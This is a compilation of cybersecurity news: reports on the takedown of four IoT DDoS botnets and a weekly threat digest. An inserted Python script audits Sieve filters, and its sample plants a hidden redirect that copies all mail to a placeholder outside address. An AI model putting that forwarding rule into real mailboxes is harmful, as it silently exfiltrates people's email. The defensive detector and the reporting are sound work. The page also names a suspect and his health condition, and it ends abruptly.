Justice Department disrupts botnets that hijacked 3 million devices

Authorities seized the infrastructure powering four botnets that hijacked a combined three million devices and launched more than 300,000 DDoS attacks between them, the Justice Department said Thursday.

The botnets (Aisuru, Kimwolf, JackSkid and Mossad) allowed their operators to sell access to the infected devices for a range of cybercrimes. The fallout spanned thousands of attacks, including some that demanded extortion payments from victims, officials said.

The globally coordinated operation, aided by law enforcement actions targeting botnet operators in Canada and Germany, disrupted the command-and-control infrastructure of all four botnets. Two of the botnets set records before their takedown, drawing widespread attention from researchers and security vendors.

The Kimwolf botnet, an Android variant of Aisuru, spread like wildfire after its operators worked out how to abuse residential proxy networks for local control, according to Synthient. It ultimately took over more than 2 million Android TV devices by January. In September, just as Kimwolf was forming, Cloudflare recorded the Aisuru botnet hitting a record 29.7 terabit-per-second DDoS attack that lasted 69 seconds.

Ultimately, officials attributed roughly 200,000 DDoS attacks to Aisuru, 90,000 to JackSkid, 25,000 to Kimwolf and about 1,000 DDoS attack commands to the Mossad botnet. DDoS attacks by financially motivated attackers, however, are often a distraction or misdirection.

"Often, a DDoS attack is simply advertising the size of an operator's botnet," Zach Edwards, threat researcher at Infoblox, told CyberScoop. Botnet operators make money by renting these controlled devices to cybercriminals for account abuse, password-reset attacks, ad-fraud schemes and residential proxy nodes, he added.

Devices infected by the four botnets include digital video recorders, webcams, Wi-Fi routers and TV set-top boxes. Hundreds of thousands of these devices are located in the United States, federal prosecutors said.

Authorities did not name the individuals involved or formally announce any arrests. They nonetheless describe the operation in near-conclusive terms, stating that the action disrupted the botnets' communications infrastructure (domains, virtual servers and other systems) to prevent further infection and limit or eliminate the botnets' ability to launch future attacks.

"Cybercriminals infiltrate infrastructure beyond physical borders, and the Defense Criminal Investigative Service participates in international operations to help safeguard the Department's global footprint," Kenneth DeChellis, special agent in charge of the Department of Defense's DCIS cyber field office, said in a statement. Some of the DDoS attacks attributed to these botnets hit IP addresses owned by the Department of Defense Information Network.

Botnets often compete for devices to infect and for opportunities to scale. As Kimwolf spread and hit those marks, it drew strong interest from researchers, authorities and vendors able to help stop it.

Kimwolf was the largest DDoS botnet ever detected, according to Tom Scholl, a vice president at Amazon Web Services, which assisted in the operation. "The scale of this botnet is staggering," he said in a LinkedIn post.

"Kimwolf represented a fundamental shift in how botnets operate and scale," Scholl added. "Unlike traditional botnets that scan the open internet for vulnerable devices, Kimwolf leveraged a new attack vector: residential proxy networks."

Under this mechanism, any organization with vulnerable internet-connected devices could unknowingly turn those devices into a node for a botnet or a foothold for a targeted attack.

"This isn't just a problem your cousin has because he bought a cheap TV box that promised free TV channels," Edwards said. Infoblox previously said nearly 25% of its customers had at least one endpoint device on a residential proxy service targeted by Kimwolf.

While it is intellectually interesting when a botnet reaches an extraordinary size, it is also a "sad reminder that security often takes a back seat to convenience and cost," Edwards said.

"Botnets are growing because more and more people are buying weird internet-connected things," he added. "Nothing in this world is free."

The takedowns mark the continuation of a steady, ongoing offensive against large-scale botnets, cybercrime marketplaces, malware, infostealers and other cybercrime tools. Some of the malicious networks hampered or taken offline by disruptions and arrests over the past year include DanaBot, Rapper Bot, Lumma Stealer, AVCheck and SocksEscort.

More than 20 companies and organizations assisted with the coordinated disruption, including law enforcement in the Netherlands and Europol. Efforts to stop botnets will continue as these malicious networks proliferate in new places and in new ways.

"We live on a compromised-device-to-DDoS-botnet merry-go-round, and while many of us wish something could slow it down, the challenges keep growing," Edwards said. "This is still a bad day for serious threat actors, and any day like that is something we should all celebrate."

Written by Matt Kapko

Matt Kapko is a reporter at CyberScoop. His beat includes cybercrime, ransomware, software defects and vulnerability (mis)management. The lifelong Californian began his journalism career in 2001, with previous stops at Cybersecurity Dive, CIO, SDxCentral and RCR Wireless News. Matt holds a bachelor's degree in journalism and history from Humboldt State University.

Justice Department disrupts 3 million-device IoT botnets behind record 31.4 Tbps global DDoS attacks

The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the command-and-control (C2) infrastructure used by several Internet of Things (IoT) botnets, namely AISURU, Kimwolf, JackSkid and Mossad, as part of a court-authorized law enforcement operation.

As part of the effort, authorities in Canada and Germany also targeted the operators behind these botnets, with a number of private-sector companies, including Akamai, Amazon Web Services, Cloudflare, DigitalOcean, Google, Lumen, Nokia, Okta, Oracle, PayPal, SpyCloud, Synthient, Team Cymru, Unit 221B and QiAnXin XLab, assisting in the investigative efforts.

"All four botnets launched distributed denial-of-service (DDoS) attacks targeting victims around the world," the Justice Department said. "Some of these attacks measured approximately 30 terabits per second, which were unprecedented attacks."

In a report last month, Cloudflare attributed to AISURU/Kimwolf a massive 31.4 Tbps DDoS attack that occurred in November 2025 and lasted only 35 seconds. Toward the end of last year, the botnet is also estimated to have taken part in hyper-volumetric DDoS attacks averaging 3 billion packets per second (Bpps), 4 Tbps and 54 million requests per second (Mrps).


Independent security journalist Brian Krebs also tracked Kimwolf's administrator to Jacob Butler (aka Dort), 23, of Ottawa, Canada. Butler told Krebs that he has not used the Dort persona since 2021 and claimed that someone is impersonating him after compromising his old account.

Butler also said that he "mostly stays home and helps his mother with household chores because he struggles with autism and social interaction." According to Krebs, the other main suspect is a 15-year-old residing in Germany. No arrests have been announced.

The botnet has recruited more than 2 million Android devices into its network, most of them compromised off-brand Android TVs. In total, the four botnets are estimated to have infected no fewer than 3 million devices worldwide, such as digital video recorders, webcams and Wi-Fi routers, hundreds of thousands of which are located in the U.S.

"The Kimwolf and JackSkid botnets are accused of targeting and infecting devices that are traditionally 'protected' from the rest of the internet. The infected devices were enslaved by the botnets' operators," the Justice Department said. "The operators then used a 'cybercrime-as-a-service' model to sell access to the infected devices to other cybercriminals."

These infected devices were then used to conduct DDoS attacks against targets of interest around the world. Court documents allege that the four Mirai botnet variants have issued hundreds of thousands of DDoS attack commands.

  • AISURU: >200,000 DDoS attack commands
  • Kimwolf: >25,000 DDoS attack commands
  • JackSkid: >90,000 DDoS attack commands
  • Mossad: >1,000 DDoS attack commands

"Kimwolf represented a fundamental shift in how botnets operate and scale. Unlike traditional botnets that scan the open internet for vulnerable devices, Kimwolf leveraged a new attack vector: residential proxy networks," Tom Scholl, vice president and distinguished engineer at AWS, said in a post shared on LinkedIn.

"By infiltrating home networks through compromised devices, including TV set-top boxes and other IoT devices, the botnet gained access to local networks that are normally shielded from external threats by home routers."

Akamai said the hyper-volumetric botnets generated attacks exceeding 30 Tbps, 14 billion packets per second and 300 Mrps, adding that cybercriminals leveraged these botnets to launch hundreds of thousands of attacks and, in some cases, demand extortion payments from victims.

"These attacks can cripple core internet infrastructure, cause significant service degradation for ISPs and their downstream customers, and even overwhelm high-capacity cloud-based mitigation services," the web infrastructure company said.

Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Agents & More – CYBERDEFENSA.MX

Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling.

This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works.

Scroll on. You’ll see what I mean.

⚡ Threat of the Week

Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities relate to an out-of-bounds write in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation in the V8 JavaScript and WebAssembly engine (CVE-2026-3910), which could result in out-of-bounds memory access or code execution, respectively. Google did not share additional details about the flaws, but acknowledged that exploits exist for both of them. The issues were addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux.

🔔 Top News

  • Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026. In a statement shared with The Hacker News, a Meta spokesperson said, "Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp."
  • Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. "The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers," the U.S. Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which intentionally disables future updates, permanently transforming SOHO routers into SocksEscort proxy nodes to blindside corporate monitoring.
  • UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim’s AWS environment within 72 hours. UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the client’s Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments.
  • KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control. Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers’ internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to differentiate malicious traffic from legitimate activity.
  • APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in the 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands. Alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent.

‎️‍🔥 Trending CVEs

New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community.

Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).

🎥 Cybersecurity Webinars

  • Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn how to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your protection. You will learn how to prove your security actually works without increasing your manual workload.
  • Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe. Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You will learn simple, practical steps to fix these problems and get better control over who has access to your company’s data.
  • The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these "AI agents" the right digital IDs. This webinar explains why current security for humans doesn’t work for autonomous bots and how to build a better system to track what they do. You will learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don’t accidentally expose your private company data.

📰 Around the Cyber World

  • Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been spotted delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). "Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app," Malwarebytes said. "For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording."
  • Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, referred to as Milkyway by the threat actors. BlackReaperRAT is capable of running commands via "cmd.exe," uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. "It carries out destructive attacks against organizations across various sectors located within the Russian Federation," BI.ZONE said. "The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena."
  • Chinese Hackers Target the Persian Gulf Region with PlugX — A China-nexus threat actor, suspected to be Mustang Panda, has targeted countries in the Persian Gulf region. The activity took place within the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. "The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering," Zscaler said. "The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution."
  • Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies. "The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations," Palo Alto Networks Unit 42 said. "Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers." The phishing pages utilize a "waiting room" tactic where the victim’s browser polls the server every two seconds and triggers redirects based on specific status codes.
  • Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit on an internet-exposed directory on 203.161.50[.]145. It’s worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations. "The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application," the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine’s State Migration Service (DMSU). Besides the possibility of a shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, a browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux. The CSS injection component is designed to progressively extract characters from Roundcube’s document object model (DOM) without injecting any JavaScript into the victim’s page. The technique is likely used for targeting Cross-Site Request Forgery (CSRF) tokens or email UIDs. Central to the Roundish toolkit is an XSS payload that’s engineered to steal the victim’s email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim’s Inbox and Sent folders, and gather the victim’s complete address book. "The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access," Hunt.io said. "From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset."
  • Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. "The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes," the company said. "This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure." Post-compromise console access has been observed within 20 minutes of credential submission. These efforts originated from Mullvad VPN infrastructure.
  • Malicious npm Packages Deliver Cipher Stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, were found to deliver, via Dropbox, a Windows executable named Cipher stealer that siphons sensitive data from compromised hosts, including Discord tokens, credentials from the Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. "The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub," JFrog said.
  • GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause the system to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It’s suspected to be part of Snake Keylogger, indicating the malware authors’ attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay’s OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account. "SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials," the company said. "They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access." The attack culminated in the deployment of ransomware, encrypting more than 60 servers.
  • Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok. In these attacks, attributed to O-UNC-036, the threat actors rely on disposable email addresses in order to execute SMS pumping attacks, also called International Revenue Sharing Fraud (IRSF). "In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider," Okta said. "Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes." O-UNC-036 has also been linked to a cybercrime-as-a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud. The web-based storefronts are hosted in Vietnam and specialize in the sale of web-based accounts.
  • Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a supply chain attack. The clipper malware payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. "The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com," Profero said. "The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic." The incident has since been resolved by AppsFlyer.
  • Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted governments and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. "One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure," Seqrite Labs said. "Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone." The activity has not been attributed to any known threat group.
  • How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. "In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers," Cofense said.
  • Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated "secure space" called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. "Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story," the company said. Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health isn’t meant to replace professional medical care.
  • Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses. What’s notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. "In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation," Irregular said. "This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways."
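The Roundish item above ends with Hunt.io's advice that mail forwarding rules and Sieve filters must be audited, not just passwords reset, because a server-side redirect survives a password change. As an added example (not code from the page, from Hunt.io, or from Roundcube), the following Python script scans a Sieve filter script for `redirect` actions and flags any that send mail to a domain outside an allowlist; the sample script, the `corp.example` / `external.example` domains and the allowlist are constructed for illustration.

```python
"""Audit Sieve filter scripts for mail-forwarding persistence.

Added example, not code from the page or from Hunt.io: it scans a Sieve
script for `redirect` actions and flags any that forward mail to a domain
outside an allowlist. Sieve syntax handled: `redirect "addr";` and
`redirect :copy "addr";` (RFC 5228 / RFC 3894), `#` line comments and
`/* */` block comments. The sample script and allowlist are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# redirect [:copy] "address" ;   (action names are case-insensitive in Sieve)
_REDIRECT_RE = re.compile(
    r'\bredirect\b\s*(?P<copy>:copy\b)?\s*"(?P<addr>[^"]*)"\s*;',
    re.IGNORECASE,
)
# Hash comments run to end of line; bracketed comments may span lines.
# Simplification: a '#' inside a quoted string would also be treated as a comment.
_COMMENT_RE = re.compile(r'#[^\n]*|/\*.*?\*/', re.DOTALL)


@dataclass(frozen=True)
class Finding:
    line: int        # 1-based line of the redirect in the original script
    address: str     # where mail is being sent
    copy: bool       # :copy leaves the original in the mailbox, so nothing looks missing
    reason: str


def strip_comments(script: str) -> str:
    """Blank out comments with spaces so character offsets and line numbers survive."""
    return _COMMENT_RE.sub(lambda m: re.sub(r'[^\n]', ' ', m.group(0)), script)


def audit_sieve(script: str, allowed_domains: set[str]) -> list[Finding]:
    """Return one Finding per redirect whose target domain is not allowlisted."""
    allowed = {d.lower() for d in allowed_domains}
    cleaned = strip_comments(script)
    findings: list[Finding] = []
    for m in _REDIRECT_RE.finditer(cleaned):
        addr = m.group('addr').strip()
        domain = addr.rsplit('@', 1)[-1].lower() if '@' in addr else ''
        if domain in allowed:
            continue
        line = cleaned.count('\n', 0, m.start()) + 1
        findings.append(Finding(
            line=line,
            address=addr,
            copy=m.group('copy') is not None,
            reason=f'forwards mail to non-allowlisted domain "{domain or "<none>"}"',
        ))
    return findings


# Constructed sample: a routine filing script with one injected forward.
SAMPLE_SCRIPT = '''# constructed sample script
require ["fileinto", "copy"];
if header :contains "subject" "ticket" {
    redirect "helpdesk@corp.example";   # internal, expected
}
/* injected: silently copy every message to an outside mailbox */
redirect :copy "dropbox@external.example";
keep;
'''
ALLOWED_DOMAINS = {"corp.example"}


if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPT, ALLOWED_DOMAINS):
        flag = " (with :copy, victim keeps a copy)" if f.copy else ""
        print(f"line {f.line}: redirect to {f.address}{flag}: {f.reason}")
```

Run it against each user's active Sieve script (for Roundcube's managesieve plugin, the script stored on the IMAP server) after an incident; a `:copy` redirect is the variant to look for first, since the mailbox owner sees nothing missing.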

🔧 Cybersecurity Tools

  • Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running. It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that works in seconds to give you better visibility into the security of your local coding environment.
  • Trajan → It is an automated security tool designed to find hidden vulnerabilities in "service meshes," which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that allow hackers to bypass security or steal data. Trajan works by scanning these configurations to spot those specific errors and helping developers fix them before they can be exploited.

Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.

Conclusion

There’s a lot packed in here, and not in a neat way. Some of it is the usual recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy.

Anyway — enough throat-clearing. Here’s the stuff worth your attention.